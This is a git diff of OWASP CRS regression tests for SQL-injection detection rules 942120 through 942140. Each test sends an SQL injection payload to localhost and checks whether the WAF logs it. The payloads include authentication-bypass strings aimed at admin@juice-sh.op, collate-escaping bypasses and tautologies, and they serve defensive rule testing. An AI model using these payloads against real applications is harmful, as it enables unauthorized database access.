- - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "+IN+%28815914%2C+815913%29%0A" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-19 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "+IN+%28815914%2C+815913%29%0A" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-19 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "+IN+%28815919%2C+815920%2C+815921%2C+815922%2C+815923%2C+815924%2C+815925%2C+815926%2C+815927%2C+815928%2C+815929%2C+815930%2C+815932%2C+815933%2C+815934%2C+815935%2C+815936%2C+815937%2C+815917%2C+815918%29%0A" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-20 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "+IN+%28815919%2C+815920%2C+815921%2C+815922%2C+815923%2C+815924%2C+815925%2C+815926%2C+815927%2C+815928%2C+815929%2C+815930%2C+815932%2C+815933%2C+815934%2C+815935%2C+815936%2C+815937%2C+815917%2C+815918%29%0A" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-20 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay= in ( Aa,- Ab-, and Ac)" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-21 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay= in ( Aa,- Ab-, and Ac)" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-21 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "%3E%3D" - version: HTTP/1.0 - output: - log_contains: id "942120" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "%3E%3D" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-22 + desc: "SQL Injection Attack: not between * and " + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "select%20*%20from%20user%20where%20password_last_changed%20not%20between%20'2021-04-11'%20and%20'2021-04-11'" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-23 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=z'or%20email%20notnull--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-24 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=x'%20or%20username%20like%20totpSecret%20escape%20'x';" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-25 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=admin%40juice-sh.op'%20and%20email%20ilike%20email--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-26 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=admin%40juice-sh.op'%20and%20email%20%3d%20all%20(select%20email)--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-27 + desc: "SQLite collate nocase" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=user'collate%20nocase--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-28 + desc: "SQLite collate nocase" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=user'collate%20nocase--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-29 + desc: "SQL collate`nocase`" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=user'collate%60nocase%60--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-30 + desc: "Invalid SQL collate foo" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=user'collate%20foo--" + version: HTTP/1.0 + output: + no_log_contains: id "942120" + - test_title: 942120-31 + desc: "Invalid SQL collate foo" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + # collate`utf8mb4_general_ci` + data: "var=user'collate%60utf8mb4_general_ci%60--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-32 + desc: "Collate bypass with character escaping" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + # collate"\utf8mb4_general_ci" + data: "var=user'collate%22%5Cutf8mb4_general_ci%22--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-33 + desc: "Collate bypass with postgress string escaping U&" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + # collate U&"\0441\043B\043E\043D" + data: "var=user'collate U%26%22%241%23B%23E%23D%22--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-34 + desc: "Detect auth bypass email=' notnull --" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=%27%20notnull%20--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-35 + desc: "Test for IJ5N1CXB - unlikely" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op'and%20unlikely%20(id)--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-36 + desc: "Negative test for IJ5N1CXB - unlikely" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: + text=It is highly unlikely this is going to be a false positive + version: HTTP/1.0 + output: + no_log_contains: id "942120" + - test_title: 942120-37 + desc: "Test for HOH7M88Q - likelihood" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: | + email=admin%40juice-sh.op\'%20and(%20likelihood%20(id,.0));' + version: HTTP/1.1 + output: + log_contains: id "942120" + - test_title: 942120-38 + desc: "Negative test for HOH7M88Q - likelihood" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: | + text=After calculating the likelihood this should not be matched. + version: HTTP/1.1 + output: + no_log_contains: id "942120" + - test_title: 942120-39 + desc: "Detect path-based SQLi attempt" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: POST + uri: "/catalogue/rest/products/2499999||this.product/reviews" + version: HTTP/1.0 + output: + log_contains: id "942120" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml index 9debe118c9..0056a00671 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml @@ -1,128 +1,160 @@ --- - meta: - author: "Christian S.J. Peron and Allan Boll" - description: None - enabled: true - name: 942130.yaml - tests: - - - test_title: 942130-1 +meta: + author: "Christian S.J. Peron and Allan Boll, Franziska Bühler" + description: None + enabled: true + name: 942130.yaml +tests: + - test_title: 942130-1 desc: "SQL Injection Attack: SQL Tautology" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "var=%221%22%20sSOUNDS%20LIKE%20%22SOUNDS%20LIKE%201&other_var=test" - version: HTTP/1.0 - output: - no_log_contains: id "942130" - - - test_title: 942130-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: /post + data: "var=%221%22%20sSOUNDS%20LIKE%20%22SOUNDS%20LIKE%201&other_var=test" + version: HTTP/1.0 + output: + no_log_contains: id "942130" + - test_title: 942130-2 desc: "SQL Injection Attack: SQL Tautology" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - uri: "/?a=1=1" - version: HTTP/1.1 - output: - log_contains: id "942130" - - - test_title: 942130-3 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1=1" + version: HTTP/1.1 + output: + log_contains: id "942130" + - test_title: 942130-3 desc: "SQL Injection Attack: SQL Tautology" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - uri: "/?a=11=1" - version: HTTP/1.1 - output: - no_log_contains: id "942130" - - - test_title: 942130-4 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=11=1" + version: HTTP/1.1 + output: + no_log_contains: id "942130" + - test_title: 942130-4 desc: "SQL Injection Attack: SQL Tautology" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - uri: "/?a=1=11" - version: HTTP/1.1 - output: - no_log_contains: id "942130" - - - test_title: 942130-5 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1=11" + version: HTTP/1.1 + output: + no_log_contains: id "942130" + - test_title: 942130-5 desc: "SQL Injection Attack: SQL Tautology" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - uri: "/?a=11!=1" - version: HTTP/1.1 - output: - log_contains: id "942130" - - - test_title: 942130-6 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=11!=11" + version: HTTP/1.1 + output: + no_log_contains: id "942130" + - test_title: 942130-6 desc: "SQL Injection Attack: SQL Tautology" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - uri: "/?a=1!=11" - version: HTTP/1.1 - output: - log_contains: id "942130" - - - test_title: 942130-7 - desc: "SQL Injection Attack: SQL Tautology" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=b,1=1" + version: HTTP/1.1 + output: + log_contains: id "942130" + - test_title: 942130-7 + desc: "SQL Injection Attack: SQL Tautology - like" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - uri: "/?a=11!=11" - version: HTTP/1.1 - output: - no_log_contains: id "942130" - - - test_title: 942130-8 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "a=42%20like%2042" + version: HTTP/1.1 + output: + log_contains: id "942130" + - test_title: 942130-8 desc: "SQL Injection Attack: SQL Tautology" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - uri: "/?a=b,1=1" - version: HTTP/1.1 - output: - log_contains: id "942130" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=This%20is%20like%20no%20other" + version: HTTP/1.1 + output: + no_log_contains: id "942130" + - test_title: 942130-9 + desc: "SQL Injection Attack: SQL Tautology using MySQL NULL-safe operator <=>" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=42<=>42" + version: HTTP/1.1 + output: + log_contains: id "942130" + - test_title: 942130-10 + desc: "SQL Injection Attack: SQL Tautology using glob" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/?user=admin%40juice-sh.op'%20and%20password%20glob%20password;" + version: HTTP/1.1 + output: + log_contains: id "942130" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml new file mode 100644 index 0000000000..934a8ac847 --- /dev/null +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml @@ -0,0 +1,114 @@ +--- +meta: + author: "Felipe Zipitria" + description: SQL Tautology + enabled: true + name: 942131.yaml +tests: + - test_title: 942131-1 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=11!=1" + version: HTTP/1.1 + output: + log_contains: id "942131" + - test_title: 942131-2 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1!=11" + version: HTTP/1.1 + output: + log_contains: id "942131" + - test_title: 942131-3 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=11!=11" + version: HTTP/1.1 + output: + no_log_contains: id "942131" + - test_title: 942131-4 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1%20is%20not%202" + version: HTTP/1.1 + output: + log_contains: id "942131" + - test_title: 942131-5 + desc: "SQL Injection Attack: SQL Tautology negative" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1%20is%20not%201" + version: HTTP/1.1 + output: + no_log_contains: id "942131" + - test_title: 942131-6 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "a='1' not regexp '2'" + version: HTTP/1.1 + output: + log_contains: id "942131" + - test_title: 942131-7 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "a='1' not regexp '1'" + version: HTTP/1.1 + output: + no_log_contains: id "942131" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml index 0a86fb9fec..1cdc7b6634 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml @@ -1,295 +1,295 @@ --- - meta: - author: "Christian S.J. Peron, Christoph Hansen" - description: None - enabled: true - name: 942140.yaml - tests: - - - test_title: 942140-1 +meta: + author: "Christian S.J. Peron, Christoph Hansen" + description: None + enabled: true + name: 942140.yaml +tests: + - test_title: 942140-1 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - uri: "/?sql_table=pg_catalog" - version: HTTP/1.0 - output: - log_contains: id "942140" - - - test_title: 942140-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?sql_table=pg_catalog" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-2 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "INFORMATION_SCHEMA" - version: HTTP/1.0 - output: - log_contains: id "942140" - - - test_title: 942140-3 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "INFORMATION_SCHEMA" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-3 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "database(" - version: HTTP/1.0 - output: - log_contains: id "942140" - - - test_title: 942140-4 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "database(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-4 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "db_name(" - version: HTTP/1.0 - output: - log_contains: id "942140" - - - test_title: 942140-5 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "db_name(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-5 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "DaTaBasE(" - version: HTTP/1.0 - output: - log_contains: id "942140" - - - test_title: 942140-6 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "DaTaBasE(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-6 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "InFoRmaTioN_ScHemA" - version: HTTP/1.0 - output: - log_contains: id "942140" - - - test_title: 942140-7 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "InFoRmaTioN_ScHemA" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-7 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "DB_NAME(" - version: HTTP/1.0 - output: - log_contains: id "942140" - - - test_title: 942140-8 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "DB_NAME(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-8 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "tempdb" - version: HTTP/1.0 - output: - log_contains: id "942140" - - - test_title: 942140-9 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "tempdb" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-9 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "msdb" - version: HTTP/1.0 - output: - log_contains: id "942140" - - - test_title: 942140-10 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "msdb" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-10 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "mysql.db" - version: HTTP/1.0 - output: - log_contains: id "942140" - - - test_title: 942140-11 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "mysql.db" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-11 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "MSysAccessObjects" - version: HTTP/1.0 - output: - log_contains: id "942140" - - - test_title: 942140-12 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "MSysAccessObjects" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-12 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "Northwind" - version: HTTP/1.0 - output: - log_contains: id "942140" - - - test_title: 942140-13 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "Northwind" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-13 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "northwind" - version: HTTP/1.0 - output: - log_contains: id "942140" - - - test_title: 942140-14 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "northwind" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-14 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SCHEMA_NAME" - version: HTTP/1.0 - output: - log_contains: id "942140" - - - test_title: 942140-15 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + 